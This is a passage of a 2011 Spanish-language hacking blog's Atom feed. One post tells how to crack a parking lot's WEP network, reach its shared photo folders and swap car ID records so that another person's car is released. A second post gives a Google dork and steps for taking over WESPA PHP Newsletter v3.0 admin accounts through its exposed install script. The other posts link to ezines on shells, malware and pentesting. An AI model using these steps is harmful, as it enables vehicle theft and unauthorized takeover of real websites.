/&gt;&lt;br /&gt;Punto.. la WLAN Tiene una Clave WEP&lt;br /&gt;&lt;br /&gt;Como todos Sabemos Con Algunas Tools Algo de Paciencia y Un Poco De buen uso de ellas podemos Obtener Dicha Clave..&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;font color="red"&gt;Como Aprovechar La Falla?&lt;/font&gt;&lt;br /&gt;&lt;br /&gt;Simple.. Simple y muy SIMPLE!&lt;br /&gt;una Vez Dentro de la red podemos ver Carpetas Compartidas!!!&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://img6.imagebanana.com/img/o0tp833u/Seleccin_001.png" imageanchor="1" style="margin-left:1em; margin-right:1em"&gt;&lt;img border="0" height="492" width="587" src="http://img6.imagebanana.com/img/o0tp833u/Seleccin_001.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;Hay Un problema.. como no tenemos El Soft Del parqueadero nos tocara Buscar de Forma manual nuestro ID&lt;br /&gt;&lt;br /&gt;Pero Es tambien Sencillo, ya que este Esta En carpetas Categorizadas por los cuantro primeros caracteres&lt;br /&gt;&lt;br /&gt;EJEMPLO: Carpeta P1F1 - P1F2 -P1F3 P1F4 -&lt;b&gt;P1F5&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;hay Esta la de Nuestro ID p1F5, Entramos y buscamos el codigo que en Nuestro caso es... 67890 hay veremos varias carpetas En horarios y dias&lt;br /&gt;&lt;br /&gt;Solo buscamos la fecha y la hora y veremos Nuestras Imagenes del Auto.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Hasta Aqui todo va Bien&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;Se preguntaran? Como obtengo un Auto...&lt;br /&gt;&lt;br /&gt;&lt;font color="brown"&gt;SACRIFICIO!&lt;/font&gt;&lt;br /&gt;&lt;br /&gt;Deberas buscar Otro Automovil en esos Horarios de Ingreso y cambiarle el iD por el tuyo y el id de el lo pones en tu Auto Asi Al llevar el carnet te daran El Automovil De las Fotos!&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Conclusion. Algo Arriesgado Muy Comprometedor, pero Si tienes un Auto MUY Viejo Obtendras una Camioneta XD.. nahh mentiras Esto No va orientado al robo Solo es Explicacion profunda de una Falla que esta en muchos Almacenes que reservo su nombre.. CARREFOUR - ALMACENES FALLABAELLA XD entre Otros..&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Nota&lt;/b&gt;:&lt;i&gt; Este articulo fue aplicado en un centro comercial de la ciudad xxxxxx donde el objetivo era el automovil de un compañero de clases, este metodo fue satisfactorio ya que el salio con mi auto y yo con el de el... esto se aplico de cierta manera por si se presentaba algun inconveniente en la seguridad.&lt;/i&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;font color="red"&gt;ACLARACION!!!!&lt;/font&gt;&lt;br /&gt;&lt;br /&gt;Este Metodo Se Aplica para los usuarios que dejan las llaves de Sus Automoviles... pero hay los que no! Tengan mucho cuidado en ese punto por que no ah de ir a reclamar un Auto que su Dueño no dejo llaves.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;GreeTz&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Todos los Users de Diosdelared - Cyberlocos&lt;br /&gt;&lt;br /&gt;Camaradas totales Xzite - linuxfer - DarkSpark - w0rm - nouter - 1410 -Golden - Karl - Cpuma - Esteban - Entre otros mas Que no recuerdo&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5347676997303684143-3794951310786120610?l=maztor.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://maztor.blogspot.com/feeds/3794951310786120610/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://maztor.blogspot.com/2011/05/como-robar-un-auto-mejor-como-tomar.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5347676997303684143/posts/default/3794951310786120610'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5347676997303684143/posts/default/3794951310786120610'/><link rel='alternate' type='text/html' href='http://maztor.blogspot.com/2011/05/como-robar-un-auto-mejor-como-tomar.html' title='Como Robar un Auto? Mejor, como tomar prestado un auto?'/><author><name>Maztor</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/--ab16VcXKr0/TbdUkgcp8EI/AAAAAAAAAAM/6GRDHb-tQPY/s220/maztorsec2.png'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://farm4.static.flickr.com/3211/2646972650_b3760749dd_t.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5347676997303684143.post-5121274399235137083</id><published>2011-05-21T20:01:00.000-07:00</published><updated>2011-05-21T20:15:18.956-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Ezines'/><title type='text'>Ezine [Hablemos de Shells]</title><content type='html'>Al no tener nada que hacer ni idea de que publicar, se me dio la idea de introducir mas el conocimiento sobre las shells, su historia, que hacen y demas espero les guste ;)!&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://www.imagengratis.org/images/caratulashell.png" imageanchor="1" style="margin-left:1em; margin-right:1em"&gt;&lt;img border="0" height="640" width="451" src="http://www.imagengratis.org/images/caratulashell.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;b&gt;Descarga:&lt;/b&gt; &lt;a href="http://www.multiupload.com/VCHOG5FVFL"&gt;Multiupload&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5347676997303684143-5121274399235137083?l=maztor.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://maztor.blogspot.com/feeds/5121274399235137083/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://maztor.blogspot.com/2011/05/ezine-hablemos-de-shells.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5347676997303684143/posts/default/5121274399235137083'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5347676997303684143/posts/default/5121274399235137083'/><link rel='alternate' type='text/html' href='http://maztor.blogspot.com/2011/05/ezine-hablemos-de-shells.html' title='Ezine [Hablemos de Shells]'/><author><name>Maztor</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/--ab16VcXKr0/TbdUkgcp8EI/AAAAAAAAAAM/6GRDHb-tQPY/s220/maztorsec2.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5347676997303684143.post-3349034147192701988</id><published>2011-05-20T17:14:00.000-07:00</published><updated>2011-05-20T17:34:15.511-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Vulnerabilidades'/><title type='text'>"WESPA PHP Newsletter v3.0" Remote Admin Password Change With install Path"</title><content type='html'>Bueno leyendo un poco sobre las ultimas vulnerabilidades lei en el blog de mi amigo &lt;a href="http://pandemic.diosdelared.com/?coment=10680"&gt;[PANDEMIC]&lt;/a&gt; sobre el cambio de contraseña remota por medio del PATH de instalacion, y aqui os pongo un ejemplo basico y directo de una falla &lt;b&gt;[CRITICA]&lt;/b&gt;.&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://img6.imagebanana.com/img/ua9eqwr8/Seleccin_003.png" imageanchor="1" style="margin-left:1em; margin-right:1em"&gt;&lt;img border="0" height="207" width="398" src="http://img6.imagebanana.com/img/ua9eqwr8/Seleccin_003.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;&lt;br /&gt;1-&lt;/b&gt; Dork: intitle:"News list Administration panel"&lt;br /&gt;intitle:"WESPA PHP Newsletter v3.0"&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://img6.imagebanana.com/img/qi0f1fnb/Seleccin_001.png" imageanchor="1" style="margin-left:1em; margin-right:1em"&gt;&lt;img border="0" height="346" width="358" src="http://img6.imagebanana.com/img/qi0f1fnb/Seleccin_001.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;2-&lt;/b&gt; Dirigirse a la url &lt;b&gt;webconwespa.com/newsletter/admin.php&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://img6.imagebanana.com/img/ua9eqwr8/Seleccin_003.png" imageanchor="1" style="margin-left:1em; margin-right:1em"&gt;&lt;img border="0" height="307" width="498" src="http://img6.imagebanana.com/img/l3mcagwo/Seleccin_004.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;3-&lt;/b&gt; Borrar de la url &lt;b&gt;"admin.php"&lt;/b&gt; y dirigirse a el PATH &lt;i&gt;/newsletter/install/install1.php y nos imprimira la configuracion&lt;/i&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://img6.imagebanana.com/img/1yd3ofk9/Seleccin_005.png"&gt;&lt;img height="270" width="610" style="border:0px;" alt="ImageBanana - Seleccin_005.png" src="http://img6.imagebanana.com/img/1yd3ofk9/Seleccin_005.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;b&gt;4-&lt;/b&gt; En el campo de &lt;b&gt;PASSWD&lt;/b&gt; podemos modificarlo por una contraseña nueva.&lt;br /&gt;&lt;br /&gt;&lt;i&gt;Config establecida&lt;/i&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://img6.imagebanana.com/img/wh8r4t95/Seleccin_006.png"&gt;&lt;img style="border:0px;" alt="ImageBanana - Seleccin_006.png" src="http://img6.imagebanana.com/img/wh8r4t95/Seleccin_006.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;i&gt;Config editada&lt;/i&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://img6.imagebanana.com/img/l5k02hjn/Seleccin_007.png"&gt;&lt;img style="border:0px;" alt="ImageBanana - Seleccin_007.png" src="http://img6.imagebanana.com/img/l5k02hjn/Seleccin_007.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;b&gt;5-&lt;/b&gt; una vez hecho estos cambios procedemos a guardar la config &lt;i&gt;"NEXT STAGE" y "FINISH INSTALL"&lt;/i&gt;.&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://img6.imagebanana.com/img/eht5msf8/Seleccin_008.png"&gt;&lt;img height="270" width="610" style="border:0px;" alt="ImageBanana - Seleccin_008.png" src="http://img6.imagebanana.com/img/eht5msf8/Seleccin_008.png" /&gt;&lt;/a&gt; &lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://img6.imagebanana.com/img/dps53428/Seleccin_009.png"&gt;&lt;img height="270" width="610" style="border:0px;" alt="ImageBanana - Seleccin_009.png" src="http://img6.imagebanana.com/img/dps53428/Seleccin_009.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;b&gt;6-&lt;/b&gt; Una vez hecho esto podemos dirigirnos a la pagina de Adm &lt;i&gt;PATH:/newsletter/admin.php&lt;/i&gt; o simplemente click en: "Goto the admin page" como se muestra en la imagen, ingresamos los nuevos datos o los que visualizamos anteriormente en la config y ya estariamos dentro!.&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://img6.imagebanana.com/img/d7z1zlyg/Seleccin_012.png"&gt;&lt;img height="270" width="610" style="border:0px;" alt="ImageBanana - Seleccin_012.png" src="http://img6.imagebanana.com/img/d7z1zlyg/Seleccin_012.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://img6.imagebanana.com/img/k7swomyi/Seleccin_013.png"&gt;&lt;img height="270" width="610" style="border:0px;" alt="ImageBanana - Seleccin_013.png" src="http://img6.imagebanana.com/img/k7swomyi/Seleccin_013.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;b&gt;NOTA:&lt;/b&gt; listo ya una vez dentro podemos dejarle una nota al administrador para que Arregle o Fixee dicho fallo.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5347676997303684143-3349034147192701988?l=maztor.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://maztor.blogspot.com/feeds/3349034147192701988/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://maztor.blogspot.com/2011/05/wespa-php-newsletter-v30-remote-admin.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5347676997303684143/posts/default/3349034147192701988'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5347676997303684143/posts/default/3349034147192701988'/><link rel='alternate' type='text/html' href='http://maztor.blogspot.com/2011/05/wespa-php-newsletter-v30-remote-admin.html' title='&quot;WESPA PHP Newsletter v3.0&quot; Remote Admin Password Change With install Path&quot;'/><author><name>Maztor</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/--ab16VcXKr0/TbdUkgcp8EI/AAAAAAAAAAM/6GRDHb-tQPY/s220/maztorsec2.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5347676997303684143.post-3887822619893838289</id><published>2011-05-15T18:12:00.000-07:00</published><updated>2011-05-15T18:12:46.083-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Ezines'/><title type='text'>Ezine [Bug Hunting Basico]</title><content type='html'>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://www.mediafire.com/?sscsoco86bp8nm9" imageanchor="1" style="margin-left:1em; margin-right:1em"&gt;&lt;img border="0" height="640" width="451" src="http://imagengratis.org/images/caratulahunti.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;b&gt;Descarga:&lt;/b&gt; &lt;a href="http://www.mediafire.com/?sscsoco86bp8nm9"&gt;Mediafire&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5347676997303684143-3887822619893838289?l=maztor.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://maztor.blogspot.com/feeds/3887822619893838289/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://maztor.blogspot.com/2011/05/ezine-bug-hunting-basico.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5347676997303684143/posts/default/3887822619893838289'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5347676997303684143/posts/default/3887822619893838289'/><link rel='alternate' type='text/html' href='http://maztor.blogspot.com/2011/05/ezine-bug-hunting-basico.html' title='Ezine [Bug Hunting Basico]'/><author><name>Maztor</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/--ab16VcXKr0/TbdUkgcp8EI/AAAAAAAAAAM/6GRDHb-tQPY/s220/maztorsec2.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5347676997303684143.post-3302361624098060106</id><published>2011-05-15T09:03:00.000-07:00</published><updated>2011-05-15T09:44:04.559-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Ezines'/><title type='text'>Ezine [Scripting Python]</title><content type='html'>&lt;center&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;a href="http://www.multiupload.com/LTSR0N396L" imageanchor="1" style="margin-left:1em; margin-center:1em"&gt;&lt;img src="http://imagengratis.org/images/caratulapy.png" border="0" height="640" width="451"&gt;&lt;/a&gt;&lt;/center&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Descarga:&lt;/b&gt; &lt;a href="http://www.multiupload.com/LTSR0N396L"&gt;Multiupload&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5347676997303684143-3302361624098060106?l=maztor.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://maztor.blogspot.com/feeds/3302361624098060106/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://maztor.blogspot.com/2011/05/ezine-scripting-python.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5347676997303684143/posts/default/3302361624098060106'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5347676997303684143/posts/default/3302361624098060106'/><link rel='alternate' type='text/html' href='http://maztor.blogspot.com/2011/05/ezine-scripting-python.html' title='Ezine [Scripting Python]'/><author><name>Maztor</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/--ab16VcXKr0/TbdUkgcp8EI/AAAAAAAAAAM/6GRDHb-tQPY/s220/maztorsec2.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5347676997303684143.post-2135218566465731436</id><published>2011-05-15T09:00:00.000-07:00</published><updated>2011-05-15T09:47:02.213-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Ezines'/><title type='text'>Ezine [Iniciando en Java]</title><content type='html'>Otra entrega para los que inician en java, con Nuestro queridisimo amigo SnakingMax&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://www.mediafire.com/file/oobo9lhi37ahdtz/Underc%5B0%5Dde%20-%20Taller%201%20JAVA.pdf" imageanchor="1" style="margin-left:1em; margin-right:1em"&gt;&lt;img border="0" height="640" width="451" src="http://imagengratis.org/images/caratulaproga.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;b&gt;&lt;br /&gt;&lt;br /&gt;Descarga:&lt;/b&gt; &lt;a href="http://www.mediafire.com/file/oobo9lhi37ahdtz/Underc%5B0%5Dde%20-%20Taller%201%20JAVA.pdf"&gt;Mediafire&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5347676997303684143-2135218566465731436?l=maztor.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://maztor.blogspot.com/feeds/2135218566465731436/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://maztor.blogspot.com/2011/05/ezine-iniciando-en-java.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5347676997303684143/posts/default/2135218566465731436'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5347676997303684143/posts/default/2135218566465731436'/><link rel='alternate' type='text/html' href='http://maztor.blogspot.com/2011/05/ezine-iniciando-en-java.html' title='Ezine [Iniciando en Java]'/><author><name>Maztor</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/--ab16VcXKr0/TbdUkgcp8EI/AAAAAAAAAAM/6GRDHb-tQPY/s220/maztorsec2.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5347676997303684143.post-1085104071739068507</id><published>2011-05-15T08:56:00.000-07:00</published><updated>2011-05-15T09:48:13.571-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Ezines'/><title type='text'>Ezine [Aprendiendo PHP]</title><content type='html'>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://www.multiupload.com/Z0QW52FUDD" imageanchor="1" style="margin-left:1em; margin-right:1em"&gt;&lt;img border="0" height="640" width="451" src="http://imagengratis.org/images/caratula2.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;&lt;br /&gt;Información:&lt;/b&gt;&lt;br /&gt;Primero que nada quiero pedir disculpas por entregar esta unidad más tarde de lo establecido, pero todos saben que siempre salen imprevistos. Esta unidad abarca temas esenciales los cuales los introduciran en este hermoso lenguaje. A continuación les dejo un índice de temas.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Indice de temas:&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;Acerca del autor&lt;br /&gt;Introducción&lt;br /&gt;¿Cómo trabajaremos?&lt;br /&gt;¿Qué editor utilizaremos?&lt;br /&gt;PHP&lt;br /&gt;MySQL&lt;br /&gt;Hola mundo&lt;br /&gt;Comentarios&lt;br /&gt;Incrustar código&lt;br /&gt;Incrustar PHP en HTML&lt;br /&gt;Incrustar HTML en PHP&lt;br /&gt;Incrustar HTML en PHP II&lt;br /&gt;Variables&lt;br /&gt;¿Cómo saber el tipo de variable?&lt;br /&gt;Funciones específicas para comprobar diferente tipo de variable&lt;br /&gt;Otra forma de nombrar a las variables&lt;br /&gt;Asignar valor por referencia&lt;br /&gt;Constantes&lt;br /&gt;Operadores&lt;br /&gt;Operadores aritméticos&lt;br /&gt;Operadores de asignación&lt;br /&gt;Operadores comparativos&lt;br /&gt;Operadores lógicos&lt;br /&gt;Operadores de incrementación y disminución&lt;br /&gt;Condicionales&lt;br /&gt;if, else y elseif&lt;br /&gt;switch&lt;br /&gt;Bucles&lt;br /&gt;While&lt;br /&gt;Do While&lt;br /&gt;For&lt;br /&gt;Foreach&lt;br /&gt;Formularios&lt;br /&gt;Método POST&lt;br /&gt;Método GET&lt;br /&gt;Procesar formulario en la misma página&lt;br /&gt;Ejercicios&lt;br /&gt;Recomendaciones&lt;br /&gt;&lt;br /&gt;&lt;b&gt;&lt;br /&gt;Dudas:&lt;/b&gt;&lt;br /&gt;Las dudas deberan ser posteadas en el foro de PHP &lt;br /&gt;(http://www.underc0de.org/foro/index.php?board=81.0) &lt;br /&gt;&lt;br /&gt;&lt;b&gt;con el siguiente formato:&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;Título: [Taller de PHP] - Título de tu duda&lt;br /&gt;&lt;b&gt;&lt;br /&gt;Comentarios:&lt;/b&gt;&lt;br /&gt;Los comentarios o sugerencias deberan hacerlos en este hilo.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Descarga:&lt;/b&gt;&lt;a href="http://www.multiupload.com/Z0QW52FUDD"&gt; Multiupload&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5347676997303684143-1085104071739068507?l=maztor.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://maztor.blogspot.com/feeds/1085104071739068507/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://maztor.blogspot.com/2011/05/ezine-aprendiendo-php.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5347676997303684143/posts/default/1085104071739068507'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5347676997303684143/posts/default/1085104071739068507'/><link rel='alternate' type='text/html' href='http://maztor.blogspot.com/2011/05/ezine-aprendiendo-php.html' title='Ezine [Aprendiendo PHP]'/><author><name>Maztor</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/--ab16VcXKr0/TbdUkgcp8EI/AAAAAAAAAAM/6GRDHb-tQPY/s220/maztorsec2.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5347676997303684143.post-2358822708983648779</id><published>2011-05-15T08:51:00.000-07:00</published><updated>2011-05-15T09:50:11.730-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Ezines'/><title type='text'>Ezine [Malwares]</title><content type='html'>Bueno aqui publicando otra ezine, creada por ANTRAX sobre malwares y subtemas&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://www.multiupload.com/15CCQQWJJU" imageanchor="1" style="margin-left:1em; margin-right:1em"&gt;&lt;img border="0" height="640" width="451" src="http://imagengratis.org/images/caratulamcv2lc.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;b&gt;Descarga: &lt;/b&gt; &lt;a href="http://www.multiupload.com/15CCQQWJJU"&gt;Multiupload&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5347676997303684143-2358822708983648779?l=maztor.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://maztor.blogspot.com/feeds/2358822708983648779/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://maztor.blogspot.com/2011/05/ezine-malwares.html#comment-form' title='2 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5347676997303684143/posts/default/2358822708983648779'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5347676997303684143/posts/default/2358822708983648779'/><link rel='alternate' type='text/html' href='http://maztor.blogspot.com/2011/05/ezine-malwares.html' title='Ezine [Malwares]'/><author><name>Maztor</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/--ab16VcXKr0/TbdUkgcp8EI/AAAAAAAAAAM/6GRDHb-tQPY/s220/maztorsec2.png'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5347676997303684143.post-1366834467417998643</id><published>2011-05-14T15:51:00.000-07:00</published><updated>2011-05-15T10:03:06.133-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Ezines'/><title type='text'>Ezine [Pentesting desde 0 Metasploit]</title><content type='html'>Bueno aqui otra ezine .DOC creada por mi compañero de Taller [DasrkSpark] donde explica la utilizacion de Herramienta Metasploit desde lo basico.&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://www.multiupload.com/V2ZCSBF5ER" imageanchor="1" style="margin-left:1em; margin-right:1em"&gt;&lt;img border="0" height="640" width="451" src="http://imagengratis.org/images/caratulapmk4sm.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Espero les sea de su agrado y el Sabado lanzaremos mas ezines y videos Gracias!!&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Descarga&lt;/b&gt;: &lt;a href="http://www.multiupload.com/V2ZCSBF5ER"&gt;Multiupload&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5347676997303684143-1366834467417998643?l=maztor.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://maztor.blogspot.com/feeds/1366834467417998643/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://maztor.blogspot.com/2011/05/ezine-pentesting-desde-0-metasploit.html#comment-form' title='1 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5347676997303684143/posts/default/1366834467417998643'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5347676997303684143/posts/default/1366834467417998643'/><link rel='alternate' type='text/html' href='http://maztor.blogspot.com/2011/05/ezine-pentesting-desde-0-metasploit.html' title='Ezine [Pentesting desde 0 Metasploit]'/><author><name>Maztor</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/--ab16VcXKr0/TbdUkgcp8EI/AAAAAAAAAAM/6GRDHb-tQPY/s220/maztorsec2.png'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5347676997303684143.post-5422571922348961399</id><published>2011-05-14T14:04:00.000-07:00</published><updated>2011-05-17T19:46:49.900-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Ezines'/><title type='text'>Ezine [Inicios en el Pentesting]</title><content type='html'>Bueno despues de un tiempo promoviendo en la comunidad UNDERC0DE los talleres de profundizacion y estudio, decido lanzar la primera ezine introductoria newbie para los que se adentran en la maravillosa practica del pentesting.&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://www.multiupload.com/QPID3V788Z" imageanchor="1" style="margin-left:1em; margin-right:1em"&gt;&lt;img border="0" height="320" width="226" src="http://imagengratis.org/images/caratulapfl8pf.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Espero les guste, mas adelante voy publicando mas, y avanzando el nivel de experiencia y dificultad.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Descarga: &lt;/b&gt; &lt;a href="http://www.multiupload.com/QPID3V788Z"&gt;Multiupload&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' 